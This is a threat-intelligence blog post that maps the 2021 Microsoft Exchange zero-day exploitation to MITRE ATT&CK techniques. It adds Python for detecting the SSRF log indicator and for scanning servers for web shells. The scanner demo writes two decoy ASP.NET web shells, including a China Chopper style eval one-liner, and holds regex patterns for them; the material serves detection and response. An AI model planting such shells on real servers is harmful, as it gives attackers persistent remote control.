Note: This blog is part of our MITRE ATT&CK Mapping series, in which we map the latest major threat intelligence incidents to the MITRE ATT&CK framework. You can view similar postings such as Mapping MITRE ATT&CK to the DPRK Financial Crime Indictment, Compromised RDP Sales, or Sandworm’s APT Campaign.
On 02 March 2021, Microsoft released an advisory describing multiple zero-day exploits used to compromise on-premises versions of Microsoft Exchange Server. Microsoft Exchange Server is a mail, calendaring, and collaboration platform designed by Microsoft mainly for business use. The observed attacks chained four previously unknown vulnerabilities in the product to access email accounts and install additional malware that gave the attackers persistence in the victim environment.
Microsoft initially attributed the detected attacks to HAFNIUM, a threat actor assessed to be state-sponsored and operating from the People’s Republic of China. This highly sophisticated actor traditionally conducts its operations from Virtual Private Servers (VPS) located in the United States. HAFNIUM primarily targets organizations in the US across various industry verticals, such as think tanks, infectious disease researchers, defense contractors, and educational institutions, for the purpose of exfiltrating information. However, subsequent analysis of the exploitation activity revealed that multiple threat actors (some reports say more than ten) were abusing unpatched versions of Microsoft Exchange Server.
While the story of these zero-day exploits is still unfolding, it is crucial to analyze how threat actors have proceeded to compromise vulnerable versions of Microsoft Exchange Server. Although Microsoft published the appropriate patches last week, initial estimates put the number of compromised organizations at around 30,000, with many more servers still unpatched. As security teams will need to prioritize patching and investigating this compromise in the coming weeks, let’s dive into the tactics, techniques, and procedures used by threat actors to exploit these four zero-day vulnerabilities by mapping MITRE ATT&CK to the Microsoft Exchange exploit chain.
Digital Shadows (now ReliaQuest) will continue to update this blog as new details of this malicious operation emerge. In the meantime, mapping the MITRE ATT&CK framework to the information disclosed by Microsoft about this sophisticated campaign is useful to understand the modus operandi of the threat actors involved and better protect your organization against potential threats. Without further ado, let’s pack our compasses and adventure shoes and begin this orienteering exercise.
T1595 – Active Scanning
Attackers have been actively scanning the internet for on-premises Microsoft Exchange Server installations that accept external connections on port 443. According to Volexity, the attackers only need the external IP address or domain name of a publicly reachable Exchange server to leverage the zero-day vulnerabilities and gain unauthorized access to the targeted environment. This technique cannot be easily mitigated, because the scanning happens outside the perimeter where defensive tooling has no control; what an organization can control is what the scanner finds. A patched server is no longer exploitable, and attackers who are working through scan results will concentrate on the servers that still are, so applying Microsoft’s patches (and restricting untrusted access to Exchange’s web endpoints where business needs allow) is the practical defense.
T1190 – Exploit Public-Facing Application
T1078 – Valid Accounts
There are two main ways to gain access to a Microsoft Exchange Server: through stolen valid account credentials, or by leveraging a vulnerability that lets an unauthenticated attacker appear as a legitimate and authorized user. CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that allows attackers to send specially crafted HTTP requests and authenticate as the Exchange server itself. The vulnerability is exploitable remotely without credentials and does not require any particular knowledge of the target environment beyond the server’s address. In the observed attacks, it was chained with the other zero-days described below, ultimately allowing the attackers to write files and run code as SYSTEM on the Exchange server.
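Microsoft’s published indicator for CVE-2021-26855 exploitation is an HttpProxy log entry with an empty AuthenticatedUser whose AnchorMailbox matches the pattern ServerInfo~*/* (the attacker-supplied routing hint that makes the front end proxy the request to a back-end path of the attacker’s choosing). The following Python is an added example, not code from the original post or from Microsoft: it parses that log format and applies the indicator. The log excerpt is constructed and simplified (real HttpProxy logs under %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy carry many more columns), and the host name, IP addresses and back-end paths in it are assumed values chosen to illustrate the shape of the indicator.

```python
import csv
import re
from typing import Dict, List

# Constructed, simplified HttpProxy log excerpt (not real customer data). Only the
# columns this check needs are kept; the real files carry many more. Rows 3 and 4
# show the indicator shape: unauthenticated request, AnchorMailbox = ServerInfo~<host>/<path>.
SAMPLE_HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
#Fields: DateTime,UrlStem,AuthenticationType,IsAuthenticated,AuthenticatedUser,AnchorMailbox,UserAgent,ClientIpAddress
2021-03-03T10:14:02.123Z,/owa/auth/logon.aspx,,false,,,Mozilla/5.0,203.0.113.10
2021-03-03T10:14:40.551Z,/owa/,Basic,true,CONTOSO\\jdoe,Smtp~jdoe@contoso.example,Mozilla/5.0,203.0.113.10
2021-03-03T10:15:07.002Z,/owa/auth/Current/themes/resources/logon.css,,false,,ServerInfo~EXCH01/autodiscover/autodiscover.xml?#,python-requests/2.25.1,198.51.100.7
2021-03-03T10:15:09.377Z,/ecp/y.js,,false,,ServerInfo~EXCH01/ecp/proxyLogon.ecp?#,python-requests/2.25.1,198.51.100.7
2021-03-03T10:16:00.000Z,/autodiscover/autodiscover.xml,Negotiate,true,CONTOSO\\svc-mon,Smtp~svc-mon@contoso.example,Outlook,10.0.0.5
"""

# Microsoft's indicator: AnchorMailbox of the form ServerInfo~<host>/<path>
ANCHOR_PATTERN = re.compile(r"^ServerInfo~[^/]+/.+")


def parse_httpproxy_log(text: str) -> List[Dict[str, str]]:
    """Parse an Exchange HttpProxy log.

    '#Fields:' names the CSV columns; other '#'-prefixed lines are metadata;
    every remaining non-empty line is one CSV data row.
    """
    fields = None
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data row appears before the #Fields header")
        values = next(csv.reader([line]))
        rows.append(dict(zip(fields, values)))
    return rows


def find_ssrf_hits(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return rows where nobody authenticated yet a back-end routing hint was set.

    A legitimate client never supplies ServerInfo~ routing; the front end derives
    the anchor from the authenticated mailbox. An empty AuthenticatedUser plus a
    ServerInfo~<host>/<path> anchor is the CVE-2021-26855 SSRF signature.
    """
    return [
        row
        for row in rows
        if row.get("AuthenticatedUser", "") == ""
        and ANCHOR_PATTERN.match(row.get("AnchorMailbox", ""))
    ]


def summarize_by_source(hits: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group hits by client IP so the analyst sees which sources abused the SSRF
    and which front-end URLs they used as the entry point."""
    by_ip: Dict[str, List[str]] = {}
    for hit in hits:
        by_ip.setdefault(hit["ClientIpAddress"], []).append(hit["UrlStem"])
    return by_ip


if __name__ == "__main__":
    hits = find_ssrf_hits(parse_httpproxy_log(SAMPLE_HTTPPROXY_LOG))
    for ip, stems in summarize_by_source(hits).items():
        print(f"{ip}: {len(stems)} unauthenticated ServerInfo~ requests via {stems}")
```

In a real investigation, point `parse_httpproxy_log` at every file in the HttpProxy log directory (the logs roll daily) and treat any hit as a confirmed exploitation attempt against that server; the client IPs and the back-end paths in AnchorMailbox then tell you what the attacker reached, which is the starting point for the web shell hunt described under T1505.003.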
T1072 – Software Deployment Tools
CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 were leveraged alongside the SSRF to achieve Remote Code Execution (RCE) on targeted systems. CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service that runs code as SYSTEM; CVE-2021-26858 and CVE-2021-27065 are post-authentication arbitrary file write vulnerabilities that let an attacker who has authenticated (or who has impersonated the server via CVE-2021-26855) write a file to any path on the server. Writing a file into one of the Exchange web directories is how the attackers dropped their web shells, and from there they could move laterally through the network, extract valuable information, and deploy further malware. In this specific scenario, attackers were consistently found using web shells to maintain access to the victim environment.
T1505.003 – Server Software Component: Web Shell
According to MITRE, “Adversaries may backdoor web servers with web shells to establish persistent access to systems”, and that is exactly what attackers did in the observed operations. By deploying web shells on the compromised servers, the attackers created a persistent way into the network that allows them to carry out a series of actions, including credential theft, data exfiltration, lateral movement, hands-on-keyboard activity, and deployment of additional payloads. Because a web shell is just another page served by IIS, it survives reboots and password resets, and it continues to work after the server is patched unless it is found and removed.
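The practical follow-up to the paragraph above is a hunt for the dropped pages. The following Python is an added example, not code from the original post or from Microsoft: it walks a directory tree, examines ASP.NET page files, and flags the content patterns typical of the small “evaluate a request parameter” shells reported on compromised Exchange servers, plus any .aspx found under aspnet_client (a directory that normally holds only static script resources). The demo directory tree, file names and page contents it builds are constructed for the example; the China Chopper style one-liner is included only as the string a scanner must recognise and is inert as text.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Content patterns seen in the ASP.NET web shells reported on compromised Exchange
# servers. Legitimate Exchange pages never evaluate request-supplied code or launch
# processes from a request parameter.
SUSPICIOUS_PATTERNS = {
    "jscript_page": re.compile(r'Page\s+Language\s*=\s*"?JScript"?', re.I),
    "eval_request": re.compile(r"eval\s*\(\s*Request", re.I),
    "unsafe_eval": re.compile(r'Request\.(Form|Item|QueryString)\s*\[[^\]]*\]\s*,\s*"unsafe"', re.I),
    "process_start": re.compile(r"System\.Diagnostics\.Process|ProcessStartInfo", re.I),
    "request_to_file": re.compile(r"new\s+System\.IO\.StreamWriter\s*\(\s*Request", re.I),
}
PAGE_SUFFIXES = {".aspx", ".asp", ".ashx", ".asmx"}


def scan_for_web_shells(root: Path) -> List[Dict[str, object]]:
    """Scan every ASP.NET page under root and report files that look like shells.

    Two rules: (1) the page body matches a suspicious pattern; (2) the page lives
    under aspnet_client, where no server-side page should exist at all.
    Returns one finding per file, sorted by path for stable output.
    """
    findings: List[Dict[str, object]] = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in PAGE_SUFFIXES:
            continue
        try:
            text = path.read_text(errors="replace")  # shells are often oddly encoded
        except OSError:
            continue
        indicators = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]
        rel = path.relative_to(root)
        if "aspnet_client" in rel.parts:
            indicators.append("page_in_aspnet_client")
        if indicators:
            findings.append({
                "path": rel.as_posix(),
                "size": path.stat().st_size,
                "indicators": indicators,
            })
    return sorted(findings, key=lambda f: f["path"])


def build_demo_tree() -> Path:
    """Create a constructed Exchange-like directory tree (assumed layout, not a real
    install): one benign page and two decoy shells for the scanner to find."""
    root = Path(tempfile.mkdtemp(prefix="exch-webshell-demo-"))
    owa_auth = root / "FrontEnd" / "HttpProxy" / "owa" / "auth"
    owa_auth.mkdir(parents=True)
    # Benign page: C# page with no request evaluation.
    (owa_auth / "logon.aspx").write_text('<%@ Page Language="C#" %>\n<html><body>Sign in</body></html>\n')
    # Decoy 1: the widely reported one-line China Chopper shape (inert text here).
    (owa_auth / "errorEE.aspx").write_text(
        '<%@ Page Language="JScript"%><%eval(Request.Item["orange"],"unsafe");%>'
    )
    # Decoy 2: a page launching a process from a request parameter, in a directory
    # that should contain no server-side pages at all.
    aspnet_client = root / "aspnet_client" / "system_web"
    aspnet_client.mkdir(parents=True)
    (aspnet_client / "help.aspx").write_text(
        '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", Request["cmd"]); %>'
    )
    return root


if __name__ == "__main__":
    for finding in scan_for_web_shells(build_demo_tree()):
        print(f"{finding['path']}  ({finding['size']} bytes): {', '.join(finding['indicators'])}")
```

On a real server, run the scan against the IIS root (C:\inetpub\wwwroot) and the Exchange FrontEnd\HttpProxy directory, and compare creation timestamps of any hit against the date the server was patched; a pattern match is a lead, not proof, so review the file by hand. Microsoft’s own Test-ProxyLogon.ps1 script performs this class of check along with the log review above and should be the first thing you run.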
T1041 – Exfiltration Over C2 Channel
Among all the actions that a web shell enables, establishing command and control (C2) is the most immediate: the shell itself is the C2 channel, with commands arriving as HTTP requests and results returning in the responses. According to the reports on the campaigns leveraging these four zero-day exploits, the threat actors used this connection to steal email data from the organization’s network, in some cases by exporting mailboxes and retrieving the archives through the shell. However, since reports are emerging that more than ten threat actors were leveraging these vulnerabilities, the post-exploitation TTPs likely varied depending on the actor behind each operation.
Along with the details of the exploited zero-day vulnerabilities, Microsoft published security updates that should be applied immediately by every organization running Exchange in its corporate environment. We’re well aware that patching communication software can be a pain for business continuity, but promptly applying these patches goes a long way toward protecting organizations from nation-state and criminal actors ready to exploit these now-public vulnerabilities. Digital Shadows (now ReliaQuest) has already observed chatter in high-profile Russian-language criminal forums discussing the potential availability of proofs of concept (PoCs) for CVE-2021-26855 and CVE-2021-27065.
It’s worth noting at this point that if your servers have already been backdoored, the patches will not remove the malicious web shells: they close the entry point but leave the attacker’s access intact, and a confirmed-compromised server likely needs to be rebuilt entirely. Microsoft published an Nmap script to check whether a server is still vulnerable, together with guidance on searching Exchange logs for evidence of exploitation. Investigating for exploitation, persistence, or evidence of lateral movement can reveal traces of a successful intrusion that took place before the patches were applied. If that’s the case, you’re now in incident response mode.
Cybercriminals can leverage installed backdoor web shells to deploy malicious payloads (e.g., ransomware) in victim environments. If the group behind the intrusion is financially motivated, it will likely attempt to deploy ransomware to fully capitalize on these vulnerabilities. Additionally, a compromised Exchange server holds privileged credentials and sits deep inside the corporate network, making it a virtual doorway into the rest of the victim’s environment and leaving cybercriminals and nation-state actors free to roam undisturbed.
It’s fundamental to stay updated on the latest vulnerabilities and security updates related to this high-profile exploit. As more details emerge, Digital Shadows (now ReliaQuest) will continue to update this post with additional analysis and recommendations, in addition to delivering intelligence updates to our clients. An in-house or outsourced Cyber Threat Intelligence (CTI) team can quickly identify trends and listings relevant to your organization, helping security teams prioritize the most exposed areas and achieve a more robust security posture.
If you’d like to get a clear picture of your attack surface, SearchLight (now ReliaQuest’s GreyMatter Digital Risk Protection) aggregates data from billions of sources across the open, deep, and dark web, giving you a view of your exposure in real time. Unlike other threat intelligence providers, Digital Shadows (now ReliaQuest) focuses on high-priority, actionable alerts as they relate to genuine threats to the business. Request a demo of SearchLight (now ReliaQuest’s GreyMatter Digital Risk Protection) here.
For existing clients, Digital Shadows (now ReliaQuest) recommends the following Shadow Search (now ReliaQuest GreyMatter Digital Risk Protection) queries for updates on developments of this event: